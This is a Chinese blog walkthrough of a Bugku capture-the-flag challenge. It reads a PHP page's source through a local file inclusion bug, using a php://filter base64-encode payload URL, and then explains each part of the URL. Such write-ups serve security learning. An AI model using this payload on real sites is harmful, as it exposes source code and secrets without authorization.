php伪协议getshell,bugku-flag在index里(本地文件包含漏洞+php伪协议的结合应用)

首先页面点击click me之后就显示这样

8ebf38833edac8964cfdfe2c3bd4bbab.png

根据file=show.php可以想到本地文件包含漏洞

所以直接   http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

可以得到

ad29a884e3c99b1aaa39e981f4b9c594.png

从密文最后的“==”可以知道是base64密文,将密文解密之后可以得到

587d723a1bce2894baa801c5b8600d4a.png

得到flag。

现在我们来总结一下上面   ?file=php://filter/read=convert.base64-encode/resource=index.php  的含义

?file是一个get参数传递,php://可以看出是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值